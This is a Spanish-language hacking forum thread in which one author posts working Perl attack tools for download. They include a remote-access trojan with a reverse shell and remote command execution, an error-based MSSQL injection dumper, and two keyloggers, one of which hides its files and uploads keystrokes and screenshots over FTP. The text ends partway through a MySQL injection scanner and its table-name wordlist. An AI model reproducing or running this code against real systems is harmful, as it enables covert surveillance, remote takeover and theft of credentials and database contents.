print "\n\n[+] Navegacion de archivos\n\n";
$cwd = daryrecibir($_[0],"getcwd"."\r\n");
print "tengo $cwd\n";
show($_[0],"/");
&menu2;

sub menu2 {
print "\n\n[Opciones]\n\n";
print "1 - Cambiar directorio\n";
print "2 - Crear archivo\n";
print "3 - Borrar archivo\n";
print "4 - Borrar directorio\n";
print "5 - Reproducir musica\n";
print "6 - Parar reproduccion\n";
print "7 - Volver al menu inicial\n\n";
print "[Opcion] : ";
chomp(my $op = <stdin>);

if ($op eq 1) {
print "\n\n[+] Directorio : ";
chomp (my $dir=<stdin>);
$ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA");
if ($ver=~/ok/ig) {
print "\n\n[+] Directory changed\n\n";
}
show($_[0],$dir);
&menu2;
<stdin>;
}

elsif ($op eq 2) {

print "\n\n[Nombre] : ";
chomp(my $name = <stdin>);
print "\n\n[Contenido] : ";
chomp(my $code = <stdin>);

daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY");

print "\n\n[+] Archivo creado \n\n";
<stdin>;
}
elsif ($op eq 3) {
print "\n\n[Archivo a borrar] : ";
chomp(my $file = <stdin>);
$re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA");
if ($re=~/ok/) {
print "\n\n[+] Archivo Borrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
}

elsif ($op eq 4) {
print "\n\n[Directorio a borrar] : ";
chomp(my $file = <stdin>);
$re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA");
if ($re=~/ok/) {
print "\n\n[+] Directorio Borrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
}

elsif ($op eq 5) {
print "\n\n[Archivo] : ";
chomp(my $file = <stdin>);
print "\n\n[+] Reproduciendo\n\n";
daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA");
<stdin>;
}
elsif ($op eq 6) {
print "\n\n[+] Reproduccion detenida\n\n";
daryrecibir($_[0],"pararmusic");
<stdin>;
}
elsif ($op eq 7) {
&menuo($_[0]);
}
else {
show($_[0],"/");
}
goto menu1;
}
}

elsif ($opcion eq 3) {
daryrecibir($_[0],"opencd");
&menuo($_[0]);
}

elsif ($opcion eq 4) {
daryrecibir($_[0],"closedcd");
&menuo($_[0]);
}

elsif ($opcion eq 5) {
print "\n[Puertos Abiertos]\n\n";
$re = daryrecibir($_[0],"porters");
while ($re=~/:(.*?):/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}
<stdin>;
&menuo($_[0]);
}
elsif ($opcion eq 6) {
print "\n[Mensaje] : ";
chomp (my $msg = <stdin>);
daryrecibir($_[0],"msgbox $msg");
<stdin>;
&menuo($_[0]);
} 
elsif ($opcion eq 7) {

menu:

my $cmd,$re;

print "\n\n>";

chomp(my $cmd= <stdin>);

if ($cmd=~/exit/ig) {
&menuo($_[0]);
}

$re = daryrecibir($_[0],"comando :$cmd:");
print "\n".$re;
goto menu;
&menuo($_[0]);
}
elsif ($opcion eq 8) {
daryrecibir($_[0],"iniciochau");
&menuo($_[0]);
}
elsif ($opcion eq 9) {
daryrecibir($_[0],"iniciovuelve");
&menuo($_[0]);
}
elsif ($opcion eq 10) {
daryrecibir($_[0],"iconochau");
&menuo($_[0]);
}
elsif ($opcion eq 11) {
daryrecibir($_[0],"iconovuelve");
&menuo($_[0]);
}

elsif ($opcion eq 12) {

&reload($_[0]);

sub reload {

my @pro;
my @pids;

my $sockex = new IO::Socket::INET( 
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

print $sockex "mostrarpro"."\r\n";
$sockex->read($re,5000);
$sockex->close;

chomp $re;

print "\n\n[+] Procesos encontrados\n\n";

while ($re=~/PROXEC(.*?)PROXEC/ig) {
if ($1 ne "") {
push(@pro,$1);
}
}

while ($re=~/PIDX(.*?)PIDX/ig) {
if ($1 ne "") {
push(@pids,$1);
}
}

$cantidad = int(@pro);

for my $num(1..$cantidad) {
if ($pro[$num] ne "") {
print "\n[+] Proceso : ".$pro[$num]."\n";
print "[+] PIDS : ".$pids[$num]."\n"; 
}
}

print q(

[Opciones]


1 - Refrescar lista
2 - Cerrar procesos
3 - Volver al menu
 
);

print "\n[Opcion] :  ";
chomp(my $opc = <stdin>);

if ($opc=~/1/ig) {
&reload($_[0]);
}
elsif($opc=~/2/ig) {
print "\n[+] Write the name of the process : ";
chomp(my $numb = <stdin>);
print "\n[+] Write the PID of the process : ";
chomp(my $pid = <stdin>);
$re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA");
if ($re=~/ok/ig) {
print "\n\n[+] Proceso cerrado\n\n";
} else {
print "\n\n[-] Error\n\n";
}
<stdin>;
&reload($_[0]);
}
elsif($opc=~/3/ig) {
&menuo($_[0]);
}
else {
&reload;
}
}
}

elsif ($opcion eq 13) {
print "\n\n[IP] : ";
chomp(my $ip = <stdin>);
print "\n\n[Port] : ";
chomp(my $port = <stdin>);
print "\n\n[+] Connected !!!\n\n";
$re = daryrecibir($_[0],"backshell :$ip:$port:");
}
elsif ($opcion eq 14) {
&menu;
}
elsif ($opcion eq 15) {
exit 1;
}	
else {
&menuo;
}
}

sub daryrecibir {

my $sockex = new IO::Socket::INET( 
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout  => 5
);

print $sockex $_[1]."\r\n";
$sockex->read($re,5000);
$sockex->close;
return $re."\r";
}

sub show {

my $re = daryrecibir($_[0],"getcwd"."\r\n");
print "\n\n[+] Directorio Actual : $re\n\n";
$re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n");
print "\n\n[Directorios]\n\n";

while ($re1=~/DIREX(.*?)DIREX/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}
	
print "\n\n[Archivos]\n\n";

while ($re1=~/FILEX(.*?)FILEX/ig) {
if ($1 ne "") {
print "[+] $1\n";
}
}

}

#
# ¿ The End ? 
#

Y el server

Código: perl



#!/usr/bin/perl
#Nefester (sERVidor) 0.1 By Doddy H
#Compilar con perl2exe para sacar consola

use IO::Socket;
use Socket;
use Win32;
use Cwd;
use Win32::MediaPlayer;
use Win32::Process::List;
use Win32::Process;
use Win32::API;

use constant SW_HIDE => 0;
use constant SW_SHOWNORMAL => 1;

my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N');
my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N');

$test = new Win32::MediaPlayer;

my $sock = IO::Socket::INET->new(LocalPort => 666,
Listen => 10,
Proto => 'tcp',
Reuse => 1); 

print "online\n";

while (my $con = $sock->accept){
$resultado = <$con>;
print "boludo mando : $resultado\n";

if ($resultado=~/msgbox (.*)/ig) {
Win32::MsgBox($1,0,"Mensaje de Dios") 
}

if ($resultado=~/backshell :(.*):(.*):/ig) {

my ($ip,$port) = ($1,$2);

print "conectando $ip con $port\n";

$ip =~s/(\s)+$//;
$port =~s/(\s)+$//;

conectar($ip,$port);
tipo();

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("export TERM=xterm;exec sh -i");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}


}

if ($resultado =~/opencd/ig) {

use Win32::API;

my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
my $rta = ' ' x 127;  
$ventana->Call('set CDAudio door open', $rta, 127, 0);
print $con "ok"."\r\n";	
}

if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) {

my ($pid,$numb) = ($1,$2);

$pid=~s/(\s)+$//;
$numb=~s/(\s)+$//;

if (Win32::Process::KillProcess($pid,$numb)) {
print $con "ok\r\n";
}
}

if ($resultado =~/closedcd/ig) {

use Win32::API;

my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N");
my $rta = ' ' x 127;  
$ventana->Call('set CDAudio door closed', $rta, 127, 0);
print $con "ok"."\r\n";	
}

if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) {

my $filex = $1;

$filex =~s/(\s)+$//;

print getcwd()."/".$filex."\n\n";

if (unlink(getcwd()."/".$filex)) {
print $con "ok\r\n"; 
}

}



if ($resultado=~/infor/ig) {
print "mando";	
use Win32;


my $domain = Win32::DomainName();
my $chip = Win32::GetChipName();
my $version = Win32::GetOSVersion();
my $nombre = Win32::LoginName();
my  $os = Win32::GetOSName();

print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n";
}


if ($resultado=~/porters/ig) {

use Net::Netstat::Wrapper;

$por = "";
@ports = Net::Netstat::Wrapper->only_port();
for(@ports) {
$por = $por.":".$_;
}
print $con $por."\r\n";
}


if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) {

my $cancion = $1;

$cancion =~s/(\s)+$//;

$test->load($cancion);
$test->play;	

}

if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) {

my $dir = $1;
$dir =~s/(\s)+$//;


if (chdir($dir)) {
print $con "ok\r\n"; 
} 

}

if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) {

my $veox = $1;
$veox =~s/(\s)+$//;

if (rmdir(getcwd()."/".$veox)) {
print $con "ok\r\n"; 
}
}



if ($resultado=~/pararmusic/ig) {
$test->close;
}



if ($resultado=~/dirnow ACATOY(.*)/ig) {

my $real = $1;
chomp $real;

$real =~s/(\s)+$//;

print "real $real\n\n";

my @archivos = coleccionar($real);

for (@archivos) {
print $_."\n";
my $todo = $real."/".$_;

print $todo."\n";

if (-f $todo) {
print $con "FILEX".$_."FILEX"."\r\n";
print "File : ".$_."\n";
}

if (-d $todo) {
print $con "DIREX".$_."DIREX"."\r\n";
print "Dir : ".$_."\n";
}

}
}

sub coleccionar {
opendir DIR,$_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}

if ($resultado=~/getcwd/ig) {
print "envie ".getcwd()."\n\n";
print $con getcwd()."\r\n";
}


if ($resultado=~/mostrarpro/ig) {


my $new = Win32::Process::List->new();  
my %process = $new->GetProcesses();
for my $pid (keys %process) {
print $con "PROXEC".$process{$pid}."PROXEC\r\n";
print $con "PIDX".$pid."PIDX\r\n";

}


}

if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) {
my $name = $1;
my $file = $2;

chomp $name;
chomp $file;

$name =~s/(\s)+$//;
$file =~s/(\s)+$//;

print "name is $name end\n";
print "file is $file end\n";

open FILE,">>".$name;
print FILE $file."\n";
close FILE;
}

if ($resultado=~/comando :(.*):/ig) {
print "llego comando $1\n";
print $resultado;
my $temp = qx($1);
print $con $temp."\r";
}

if ($resultado=~/iniciochau/g) {
inicio_chau("Shell_TrayWnd");
} 
if ($resultado=~/iniciovuelve/g) {
inicio_vuelve("Shell_TrayWnd");
} else {
print $resultado;
}
if ($resultado=~/iconovuelve/g) {
icono_vuelve("Program Manager");
}
if ($resultado=~/iconochau/g) {
icono_chau("Program Manager");
}


sub icono_vuelve {
$handle = $a->Call(0,$_[0]);
$b->Call($handle,SW_SHOWNORMAL);

}

sub icono_chau {

$handle = $a->Call(0,$_[0]);
$b->Call($handle,SW_HIDE);

}

sub inicio_vuelve {
$handlex = $a->Call($_[0],0);
$b->Call($handlex,SW_SHOWNORMAL);

}

sub inicio_chau {

$handlea = $a->Call($_[0],0);
$b->Call($handlea,SW_HIDE);

}


}


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: php


https://sourceforge.net/projects/nefaster/

#490

Perl / [Perl] MSSQL T00l

Julio 03, 2011, 09:47:39 PM

Bueno , aca les traigo una tool en perl para
buscar tablas y columnas con information_schema en MSSQL
Tambien pueden sacar los valores que quieren de las columnas.

Código: perl


#!usr/bin/perl
#MSSQL T00l
#(C) Doddy Hackman 2011


use LWP::UserAgent;
use HTTP::Request::Common;

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

sub head {
print q(

 @@    @@   @@@@  @@@@   @@@    @@     @@@@@@  @@@      @@@    @@  
 @@@  @@@  @@  @ @@  @  @@@@@   @@       @@   @@@@@    @@@@@   @@  
 @@@  @@@  @@    @@    @@   @@  @@       @@  @@   @@  @@   @@  @@  
@@@@@@@@@@  @@@   @@@  @@   @@  @@       @@  @@   @@  @@   @@  @@  
@@ @@@@ @@    @@    @@ @@ @@@@  @@       @@  @@   @@  @@   @@  @@  
@@  @@  @@ @  @@ @  @@  @@@@@   @@       @@   @@@@@    @@@@@   @@  
@@  @@  @@ @@@@  @@@@    @@@@@  @@@@     @@    @@@      @@@    @@@@
                                                                  


);
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
<stdin>;
exit(1);
}

repe();

sub repe {

system("cls");


head();


print "\n\n[Page] : ";
chomp(my $page=<stdin>);

$code = toma($page);

if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) {
print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n";
} else {
print "\n\n[-] Not vulnerable\n\n";
#copyright();
}

menu:

print q(

##################################

1 - Dump tables
2 - Dump Columns of the a table
3 - Dump values
4 - Change target
5 - Exit

##################################


);

print "[Opcion] : ";
chomp(my $op=<stdin>);

if ($op eq 1) {
print "\n\n[*] Dumping tables...\n\n";
mssql_tables($page);
goto menu;
}
elsif ($op eq 2) {
print "\n\n[Table] : ";
chomp (my $tab = <stdin>);
print "\n\n[*] Dumping columns..\n\n";
mssql_columns($page,$tab);
goto menu;
}
elsif($op eq 3) {
print "\n\n[Table] : ";
chomp (my $tab=<stdin>);
print "\n\n[Column] : ";
chomp(my $col=<stdin>);
print "\n\n[*] Dumping values..\n\n";
mssql_data($page,$tab,$col);
goto menu;
}
elsif ($op eq 4) {
repe();
}
elsif ($op eq 5) {
copyright();
}
else {
goto menu;
} 

#@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users");


sub mssql_columns {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Column found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_tables {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Table found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}

sub mssql_data {
($pass1,$pass2) =  bypass("--");
my $sir;
for (1..666) {
$path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2;
#print "$path\n";
$code = toma($_[0].$path);
if ($code=~/value '(.*?)' to/ig) {
$sir.= ",'".$1."'";
print "[Data found : $1]\n";
} else {
print "\n\n[+] Finish\n";
last;
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub toma {
return $nave->request(GET $_[0])->content;
}


# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: php


https://sourceforge.net/projects/mssqltool/

#491

Perl / [Perl] Manager

Julio 03, 2011, 09:47:26 PM

Bueno , aca les traigo un programa que los ayudara a listar todos los
procesos y cerrar el que quieran
En esta version podran tener una interfaz grafica

Código: perl


#!usr/bin/perl
#Manager (C) Doddy Hackman 2010
#Module neccesary
#ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd 

use Win32::Process::List;
use Win32::Process;
use Tk;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

$new = MainWindow->new(-background=>"black");
$new->geometry("250x300+20+20");
$new->resizable(0,0);
$new->title("Manager 0.1");
$new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Process")->pack();
my $lists = $new->Listbox(-background=>"black",-foreground=>"green")->place(-y=>"50",-x=>"60");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Close",-activebackground=>"green",-width=>"40",-command=>\&close)->place(-y=>"218");
$new->Button(-background=>"black",-foreground=>"green",-text=>"Refresh",-width=>"40",-activebackground=>"green",-command=>\&refresh)->place(-y=>"240");
$new->Button(-background=>"black",-foreground=>"green",-text=>"About",-width=>"40",-activebackground=>"green",-command=>\&about)->place(-y=>"263");	

&refresh;

MainLoop;


sub refresh {

my @pids;
my @procer;
my $limit;

$lists->delete(0.0,"end");

my $new = Win32::Process::List->new();  
my %process = $new->GetProcesses();
my $limit = -1;
for my $pid (keys %process) {
$limit++;
push (@procer,$process{$pid});
push (@pids,$pid);
}
print "\n\n[+] ".int(@procer)."\n\n";
for my $n(0..$limit) {
print $procer[$n]."\n";
$lists->insert("end",$procer[$n]);
}
	

}

sub close {

$d = $lists->curselection();

for my $id (@$d) {

my $proceso = $lists->get($id);

my $pida = Win32::Process::List->new();
my @pid = $pida->GetProcessPid($proceso);

Win32::Process::KillProcess(@pid[1],$proceso);
sleep 3;
&refresh();
}
}



sub about {
$about = MainWindow->new(-background=>"black");
$about->title("About");
$about->geometry("150x100+20+20");
$about->resizable(0,0);
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Coded By Doddy H")->pack();
$about->Label(-background=>"black",-foreground=>"green")->pack();
$about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"2011")->pack();
}



# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: php


https://sourceforge.net/projects/managerx/

#492

Perl / [Perl] Keycagator 0.7

Julio 03, 2011, 09:47:14 PM

Hola a todos , aca les traigo la nueva version de este keylogger
En esta version ya es aceptable con las siguientes opciones

Captura letras reconociendo mayusculas y minusculas
Captura ventanas en la que se trabaja
Toma fotos del sistema cada 1 minuto
Sube logs y fotos tomadas por FTP

Oculta rastros

Código: perl


#!usr/bin/perl
#KeyCagator 0.7 (C) Doddy Hackman 2011
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys);
use Win32::Clipboard;
use threads;
use Net::FTP;
use Win32::File;
use Cwd;

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
my $tengo = 0;	

#if ($^O eq 'MSWin32') {
#use Win32::Console; 
#Win32::Console::Free();
#}

hideit($0,"hide");

subirftp("logs.txt","logs.txt");

my $comando1 = threads->new(\&capture_windows);
my $comando2 = threads->new(\&capture_keys);
my $comando3 = threads->new(\&capture_screen);

$comando1->join();
$comando2->join();
$comando3->join();


sub capture_windows {

while(1) {

my $win1 = GetForegroundWindow();         
my $win2 = GetForegroundWindow(); 

if($win1 != $win2){
my $nombre = GetWindowText($win1); 
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}
}
return 1;
}
	
sub capture_keys {

while(1) {

my $test1;
my $test2;

for my $num(0x30..0x39) { #Numbers	

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) {	#Words

if (dame($num)) {

if (dame(0x20)) {
savefile("logs.txt"," ");
}

if (dame(0x32)) {
savefile("logs.txt","\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
} 
}
}
}
return 1;
}

sub capture_screen {

$numero = 0;

while(1) {

sleep 60;

$numero++;

SetForegroundWindow(1);
SendKeys('%{PRTSCR}'); 

my $a = Win32::Clipboard::GetBitmap();

open (FOTO,">".$numero.".bmp");
binmode(FOTO);
print FOTO $a;
close FOTO;

hideit($numero.".bmp","hide");
subirftp($numero.".bmp",$numero.".bmp");
}
}

sub dame {
return($come->Call(@_) & 1);
}

sub savefile {

open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE; 

hideit($_[0],"hide");

}

sub hideit {
if ($_[1] eq "show") {
Win32::File::SetAttributes($_[0],NORMAL);
}
elsif ($_[1] eq "hide") {
Win32::File::SetAttributes($_[0],HIDDEN);
}
else {
print "error\n";
}
}

sub subirftp {

if ($ser = Net::FTP->new("localhost")) {
if ($ser->login("doddy","123")) {
print "subi".getcwd()."/".$_[0]."\n";
if ($ser->put(getcwd()."/".$_[0],$_[1])) {
return true;
}
}
$ser->close;
}


}

sub verpar{ 
return ($_[0] % 2 == 0) ? "1" : "2";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?

#493

Perl / [Perl] KeyCagator 0.4

Julio 03, 2011, 09:46:58 PM

Bueno , este es un keylogger en perl que hice con las siguientes opciones

* Captura teclas reconociendo mayusculas y minusculas
* Muestra ventanas en las que se esta trabajando

Pocas opciones pero mejor la version anterior

Código: perl


#!usr/bin/perl
#KeyCagator 0.4 (C) Doddy Hackman 2010
#

use Win32::API;
use Win32::GuiTest qw(GetForegroundWindow GetWindowText);

my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I");
my $tengo = 0;	

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

while (true) {

capture_windows();
capture_keys();

}

sub capture_windows {

my $win1 = GetForegroundWindow();         
my $win2 = GetForegroundWindow(); 

if($win1 != $win2){
my $nombre = GetWindowText($win1); 
chomp($nombre);
if ($nombre ne "") {
#print "\n\n[".$nombre."]\n\n";
savefile("logs.txt","\n\n[".$nombre."]\n\n");
}
}

}
	
sub capture_keys {

my $test1;
my $test2;


capture_windows();

for my $num(0x30..0x39) { #Numbers	

capture_windows();

if (dame($num)) {
#print "number : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}
}

if (dame(0x14)) {
$test1 = 1;
$tengo++;
}

for my $num(0x41..0x5A) {	#Words


capture_windows();

if (dame($num)) {


if (dame(0x0d)) {
savefile("logs.txt","\n\n[enter]\n\n");
}

unless (verpar($tengo) eq 1) {
#print "MAYUSCULA : ".chr($num)."\n";
savefile("logs.txt",chr($num));
}

if (dame(0x10) or dame(0xA0) or dame(0xA1)) {
#print "MAYUSCULA : ".chr($num)."\n";
$test2 = 1;
}

unless ($test1 eq 1 or $test2 eq 1) {
if ($num >= 0x41) {
if ($num <= 0x5A) {
if (verpar($tengo) eq 1) {
#print "MINUSCULA : ".chr($num+32)."\n";
savefile("logs.txt",chr($num+32));
}
}
}
} 
}
}

}

sub dame {
return($come->Call(@_) & 1);
}

sub savefile {
open (SAVE,">>".$_[0]);
print SAVE $_[1];
close SAVE; 
}

sub verpar{ 
return ($_[0] % 2 == 0) ? "1" : "2";
}


#Credits : to explorer for helpme with the function verpar()
#Mail : lepuke[at]hotmail[com]
#Blog : doddy-hackman.blogspot.com
# ¿ The End ?

Si lo quieren descargar desde sourceforge

Código: php


https://sourceforge.net/projects/keycagator/

#494

Perl / [Perl] K0bra 0.5

Julio 03, 2011, 09:46:20 PM

Bueno esta es la nueva version de un scanner sqli que habia hecho ,
le arregle varios errores y agregue algunas cosas

Código: perl


#!usr/bin/perl
#k0bra 0.5
#Automatic SQL Scanner for MYSQL
#(c)0ded By Doddy H
#
#
#C:\Users\DoddyH>perl k0bra.pl http://127.0.0.1/sql.php?id= --
#
#
#
#
# @      @@   @
#@@     @  @ @@
# @ @@  @  @  @ @   @ @ @@@
# @ @   @  @  @@ @ @@@ @  @
# @@    @  @  @  @  @   @@@
# @ @   @  @  @  @  @  @  @
#@@@ @   @@   @@@  @@@ @@@@@
#
#
#
#
#[Status] : Scanning.....
#[Status] : Enjoy the menu
#
#[Target confirmed] : http://127.0.0.1/sql.php?id=-1+union+select+hackman,2,3
#[Bypass] : --
#
#
#
#--== information_schema.tables ==--
#
#[1] : Show tables
#[2] : Show columns
#[3] : Show DBS
#[4] : Show tables witg other DB
#[5] : Show columns with other DB
#
#
#--== mysql.user ==--
#
#[6] : Show users
#
#
#--== Others ==--
#
#[7] : Fuzzing tables
#[8] : Fuzzing columns
#[9] : Fuzzing files with load_file
#[10] : Dump
#[11] : Informacion of the server
#[12] : Create a shell with into outfile
#[13] : Show Log
#[14] : Exit
#
#
#[Option] : Enjoy this program xDDDDD
#
 
system('cls');
system ("title k0bra");



@buscar1 =('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario','web_users','name','names','nombre','nombres','usuarios','member','members','admin_table','usuaris','web_usuarios','miembro','miembros','membername','admins','administrator','sign','config','USUARIS','cms_operadores','administrators','passwd','password','passwords','pass','Pass','mpn_authors','author','musuario','mysql.user','user_names','foro','tAdmin','tadmin','user_password','user_passwords','user_name','member_password','mods','mod','moderators','moderator','user_email','jos_users','mb_user','host','apellido_nombre','user_emails','user_mail','user_mails','mail','emails','email','address','jos_usuarios','tutorial_user_auth','e-mail','emailaddress','correo','correos','phpbb_users','log','logins','login','tbl_usuarios','user_auth','login_radio','registers','register','usr','usrs','ps','pw','un','u_name','u_pass','tbl_admin','usuarios_head','tpassword','tPassword','u_password','nick','nicks','manager','managers','administrador','BG_CMS_Users','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id','foro_usuarios','cliente','sistema_usuario','sistema_password','contrasena','auth','key','senha','signin','dir_admin','alias','clientes','tb_admin','tb_administrator','tb_login','tb_logon','tb_members_tb_member','calendar_users','cursos','tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','curso','membros','utilizadores','staff','nuke_authors','accounts','account','accnts','signup','leads','lead','associated','accnt','customers','customer','membres','administrateur','utilisateur','riacms_users','tuser','tusers','utilisateurs','amministratore','god','God','authors','wp_users','tb_usuarios','asociado','asociados','autores','autor','Users','Admin','Members','tb_usuario','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','USUARIO','USUARIOS','MIEMBROS','MIEMBRO','USR_NAME','about','access','admin_id','admin_name','admin_pass','admin_passwd','admin_password','admin_pwd','admin_user','admin_userid','admin_username','adminemail','adminid','administrator_name','adminlogin','adminmail','adminname','adminuser','adminuserid','adminusername','aid','aim','apwd','auid','authenticate','authentication','blog','cc_expires','cc_number','cc_owner','cc_type','cfg','cid','clientname','clientpassword','clientusername','conf','contact','converge_pass_hash','converge_pass_salt','crack','customers_email_address','customers_password','cvvnumber]','data','db_database_name','db_hostname','db_password','db_username','download','e_mail','emer','emni','emniplote','emri','fjalekalimi','fjalekalimin','full','gid','group','group_name','hash','hashsalt','homepage','icq','icq_number','id','id_group','id_member','images','ime','index','ip_address','kodi','korisnici','korisnik','kpro_user','last_ip','last_login','lastname','llogaria','login_admin','login_name','login_pass','login_passwd','login_password','login_pw','login_pwd','login_user','login_username','logini','loginkey','loginout','logo','logohu','lozinka','md5hash','mem_login','mem_pass','mem_passwd','mem_password','mem_pwd','member_id','member_login_key','member_name','memberid','memlogin','mempassword','my_email','my_name','my_password','my_username','myname','mypassword','myusername','nc','new','news','number','nummer','p_assword','p_word','pass_hash','pass_w','pass_word','pass1word','passw','passwordsalt','passwort','passwrd','perdorimi','perdoruesi','personal_key','phone','privacy','psw','punetoret','punonjes','pword','pwrd','salt','search','secretanswer','secretquestion','serial','session_member_id','session_member_login_key','sesskey','setting','sid','sifra','spacer','status','store','store1','store2','store3','store4','table_prefix','temp_pass','temp_password','temppass','temppasword','text','uid','uname','user_admin','user_icq','user_id','user_ip','user_level','user_login','user_n','user_pass','user_passw','user_passwd','user_pw','user_pwd','user_pword','user_pwrd','user_un','user_uname','user_username','user_usernm','user_usernun','user_usrnm','user1','useradmin','userid','userip','userlogin','usern','usernm','userpass','userpassword','userpw','userpwd','usr_n','usr_name','usr_pass','usr2','usrn','usrnam','usrname','usrnm','usrpass','warez','xar_name','xar_pass','nom dutilisateur','mot de passe','compte','comptes','aide','objectif','authentifier','authentification','Contact','fissure','client','clients','de donn?es','mot_de_passe_bdd','t?l?charger','E-mail','adresse e-mail','Emer','complet','groupe','hachage','Page daccueil','Kodi','nom','connexion','membre','MEMBERNAME','mon_mot_de_passe','monmotdepasse','ignatiusj','caroline-du-nord','nouveau','Nick','passer','Passw','Mot de passe','t?l?phone','protection de la vie priv?e','PSW','pWord','sel','recherche','de 